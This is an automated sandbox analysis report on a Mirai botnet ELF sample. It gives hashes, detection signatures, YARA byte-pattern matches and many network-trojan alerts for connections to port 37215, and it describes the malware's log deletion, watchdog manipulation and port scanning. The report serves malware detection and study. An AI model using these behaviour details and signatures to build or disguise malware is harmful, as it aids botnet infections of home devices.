Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
WIwTo1UTMq.elf

Overview

General Information

Sample name:WIwTo1UTMq.elf
renamed because original name is a hash value
Original sample name:88e66d3ffdb78ac36dec93f81f898ad1.elf
Analysis ID:1483124
MD5:88e66d3ffdb78ac36dec93f81f898ad1
SHA1:70383254c1f54b1401ba28ca982cc08b8a8f8cc5
SHA256:023a49b27d0b741a27487cc730e2289da4170336dc2c106db22e8fa3864d3c02
Tags:32armelfgafgyt
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Contains symbols with names commonly found in malware
Deletes system log files
Manipulation of devices in /dev
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1483124
Start date and time:2024-07-26 17:41:13 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 13s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:WIwTo1UTMq.elf
renamed because original name is a hash value
Original Sample Name:88e66d3ffdb78ac36dec93f81f898ad1.elf
Detection:MAL
Classification:mal100.troj.evad.linELF@0/0@73/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: WIwTo1UTMq.elf
Command:/tmp/WIwTo1UTMq.elf
PID:5525
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
WIwTo1UTMq.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    WIwTo1UTMq.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      WIwTo1UTMq.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        WIwTo1UTMq.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          WIwTo1UTMq.elfLinux_Trojan_Mirai_0bce98a2unknownunknown
          • 0x16374:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          5525.1.00007f1cf8017000.00007f1cf802f000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            5525.1.00007f1cf8017000.00007f1cf802f000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
              5525.1.00007f1cf8017000.00007f1cf802f000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                5525.1.00007f1cf8017000.00007f1cf802f000.r-x.sdmpLinux_Trojan_Mirai_0bce98a2unknownunknown
                • 0x16374:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
                5525.1.00007f1cf8017000.00007f1cf802f000.r-x.sdmpMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
                • 0x1631c:$x2: /dev/misc/watchdog
                • 0x1630c:$x3: /dev/watchdog
                • 0x16380:$s5: HWCLVGAJ
                Click to see the 1 entries
                No Snort rule has matched
                Timestamp:2024-07-26T17:42:38.606153+0200
                SID:2835222
                Source Port:38136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.034146+0200
                SID:2835222
                Source Port:46624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.964048+0200
                SID:2835222
                Source Port:42956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.652743+0200
                SID:2835222
                Source Port:55216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:24.644108+0200
                SID:2835222
                Source Port:40454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.401570+0200
                SID:2835222
                Source Port:58766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.649976+0200
                SID:2835222
                Source Port:43250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.752068+0200
                SID:2835222
                Source Port:40996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.602358+0200
                SID:2835222
                Source Port:60884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.506478+0200
                SID:2835222
                Source Port:42294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.200167+0200
                SID:2835222
                Source Port:52598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:30.926428+0200
                SID:2835222
                Source Port:51110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.988608+0200
                SID:2835222
                Source Port:58670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.602102+0200
                SID:2835222
                Source Port:35256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:09.449482+0200
                SID:2835222
                Source Port:35634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.221999+0200
                SID:2835222
                Source Port:56024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.326651+0200
                SID:2835222
                Source Port:55986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:26.476272+0200
                SID:2835222
                Source Port:59712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:04.748495+0200
                SID:2835222
                Source Port:40296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.475233+0200
                SID:2835222
                Source Port:35542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.966091+0200
                SID:2835222
                Source Port:45270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:19.129689+0200
                SID:2835222
                Source Port:33088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.301159+0200
                SID:2835222
                Source Port:33010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:34.899760+0200
                SID:2835222
                Source Port:45998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:33.042545+0200
                SID:2835222
                Source Port:34332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:00.662098+0200
                SID:2835222
                Source Port:42984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.204533+0200
                SID:2835222
                Source Port:60956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751984+0200
                SID:2835222
                Source Port:48768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.105182+0200
                SID:2835222
                Source Port:59276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.293761+0200
                SID:2835222
                Source Port:42424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.977903+0200
                SID:2835222
                Source Port:58488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:45.131370+0200
                SID:2835222
                Source Port:37840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.474935+0200
                SID:2835222
                Source Port:49618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:44.306039+0200
                SID:2835222
                Source Port:47198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.390099+0200
                SID:2835222
                Source Port:40364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:58.924546+0200
                SID:2835222
                Source Port:42158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:53.132234+0200
                SID:2835222
                Source Port:44386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:04.732612+0200
                SID:2835222
                Source Port:43966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.256365+0200
                SID:2835222
                Source Port:52438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.504004+0200
                SID:2835222
                Source Port:46722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:54.163417+0200
                SID:2835222
                Source Port:32780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:27.004016+0200
                SID:2835222
                Source Port:58502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.846531+0200
                SID:2835222
                Source Port:50092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.374536+0200
                SID:2835222
                Source Port:40700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:07.666081+0200
                SID:2835222
                Source Port:47732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.173602+0200
                SID:2835222
                Source Port:40758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.474723+0200
                SID:2835222
                Source Port:35754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:00.630205+0200
                SID:2835222
                Source Port:33072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:02.573716+0200
                SID:2835222
                Source Port:54620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.169236+0200
                SID:2835222
                Source Port:39342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.690145+0200
                SID:2835222
                Source Port:36816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751852+0200
                SID:2835222
                Source Port:51664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.901285+0200
                SID:2835222
                Source Port:41604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:00.561044+0200
                SID:2835222
                Source Port:57554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.160228+0200
                SID:2835222
                Source Port:55488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:33.008864+0200
                SID:2835222
                Source Port:39524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:34.312161+0200
                SID:2835222
                Source Port:38930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:19.315465+0200
                SID:2835222
                Source Port:50864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:04.642054+0200
                SID:2835222
                Source Port:48604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.034149+0200
                SID:2835222
                Source Port:37412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287275+0200
                SID:2835222
                Source Port:60618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:46.396192+0200
                SID:2835222
                Source Port:34504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:00.567662+0200
                SID:2835222
                Source Port:57910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.937307+0200
                SID:2835222
                Source Port:41060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:35.406784+0200
                SID:2835222
                Source Port:33718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.752024+0200
                SID:2835222
                Source Port:46796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.177733+0200
                SID:2835222
                Source Port:60384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.000803+0200
                SID:2835222
                Source Port:35146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.208270+0200
                SID:2835222
                Source Port:43150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.313201+0200
                SID:2835222
                Source Port:46342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.300032+0200
                SID:2835222
                Source Port:56566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:42.068020+0200
                SID:2835222
                Source Port:60248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:02.583024+0200
                SID:2835222
                Source Port:38974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.506477+0200
                SID:2835222
                Source Port:43612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:48.050350+0200
                SID:2835222
                Source Port:56112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.504855+0200
                SID:2835222
                Source Port:34064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:40.525022+0200
                SID:2835222
                Source Port:43882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:05.370024+0200
                SID:2835222
                Source Port:47970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.851139+0200
                SID:2835222
                Source Port:45972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.852370+0200
                SID:2835222
                Source Port:45884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.895905+0200
                SID:2835222
                Source Port:48610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.297382+0200
                SID:2835222
                Source Port:35352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.237998+0200
                SID:2835222
                Source Port:40810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:27.005428+0200
                SID:2835222
                Source Port:54018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.473493+0200
                SID:2835222
                Source Port:50358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:24.574254+0200
                SID:2835222
                Source Port:39382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.254755+0200
                SID:2835222
                Source Port:60700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:24.496351+0200
                SID:2835222
                Source Port:55718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751817+0200
                SID:2835222
                Source Port:52262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:33.101565+0200
                SID:2835222
                Source Port:44458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.846961+0200
                SID:2835222
                Source Port:55860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.848710+0200
                SID:2835222
                Source Port:35202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.166545+0200
                SID:2835222
                Source Port:47378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:52.054806+0200
                SID:2835222
                Source Port:54652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.301858+0200
                SID:2835222
                Source Port:51974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:52.052546+0200
                SID:2835222
                Source Port:35598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.895360+0200
                SID:2835222
                Source Port:48270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.313541+0200
                SID:2835222
                Source Port:40582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287840+0200
                SID:2835222
                Source Port:35734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.320501+0200
                SID:2835222
                Source Port:42592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:21.683970+0200
                SID:2835222
                Source Port:48170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.005059+0200
                SID:2835222
                Source Port:54740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:30.926552+0200
                SID:2835222
                Source Port:59856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:35.410112+0200
                SID:2835222
                Source Port:35322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:52.053910+0200
                SID:2835222
                Source Port:42942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:58.931073+0200
                SID:2835222
                Source Port:54164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:44.179097+0200
                SID:2835222
                Source Port:43788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:24.744358+0200
                SID:2835222
                Source Port:48634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.602194+0200
                SID:2835222
                Source Port:37064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.222003+0200
                SID:2835222
                Source Port:51200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.988461+0200
                SID:2835222
                Source Port:51390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:22.213085+0200
                SID:2835222
                Source Port:57726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:27.582928+0200
                SID:2835222
                Source Port:45830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.988504+0200
                SID:2835222
                Source Port:50774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.319648+0200
                SID:2835222
                Source Port:38686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:35.371726+0200
                SID:2835222
                Source Port:39814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.195579+0200
                SID:2835222
                Source Port:49120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:27.099046+0200
                SID:2835222
                Source Port:43852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:40.508090+0200
                SID:2835222
                Source Port:49088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.991958+0200
                SID:2835222
                Source Port:53050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:24.298927+0200
                SID:2835222
                Source Port:33294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287665+0200
                SID:2835222
                Source Port:50306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:58.931120+0200
                SID:2835222
                Source Port:60732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:32.927164+0200
                SID:2835222
                Source Port:54384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:25.612220+0200
                SID:2835222
                Source Port:40130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:02.255120+0200
                SID:2835222
                Source Port:38458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.977009+0200
                SID:2835222
                Source Port:43790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:40.406693+0200
                SID:2835222
                Source Port:44016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:00.592506+0200
                SID:2835222
                Source Port:36918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.661028+0200
                SID:2835222
                Source Port:59606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:25.520747+0200
                SID:2835222
                Source Port:53874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.391929+0200
                SID:2835222
                Source Port:34044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.177267+0200
                SID:2835222
                Source Port:53598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:41.972935+0200
                SID:2835222
                Source Port:38070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751901+0200
                SID:2835222
                Source Port:48914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:35.410237+0200
                SID:2835222
                Source Port:35768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.377075+0200
                SID:2835222
                Source Port:44814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.752072+0200
                SID:2835222
                Source Port:39956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:27.003890+0200
                SID:2835222
                Source Port:57184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.158441+0200
                SID:2835222
                Source Port:60644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:54.301870+0200
                SID:2835222
                Source Port:48758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.501151+0200
                SID:2835222
                Source Port:58518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.256757+0200
                SID:2835222
                Source Port:42792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.275312+0200
                SID:2835222
                Source Port:40324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.502982+0200
                SID:2835222
                Source Port:46258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.975556+0200
                SID:2835222
                Source Port:51144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:16.209335+0200
                SID:2835222
                Source Port:48216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751815+0200
                SID:2835222
                Source Port:38118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:32.923783+0200
                SID:2835222
                Source Port:46824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.336979+0200
                SID:2835222
                Source Port:51146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.504314+0200
                SID:2835222
                Source Port:45738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.316412+0200
                SID:2835222
                Source Port:44786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.860163+0200
                SID:2835222
                Source Port:60248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.256374+0200
                SID:2835222
                Source Port:59548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.937919+0200
                SID:2835222
                Source Port:51760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287930+0200
                SID:2835222
                Source Port:43448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.302811+0200
                SID:2835222
                Source Port:58996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.545190+0200
                SID:2835222
                Source Port:39856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:12.149134+0200
                SID:2835222
                Source Port:58294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:04.890855+0200
                SID:2835222
                Source Port:58180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.851209+0200
                SID:2835222
                Source Port:48448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
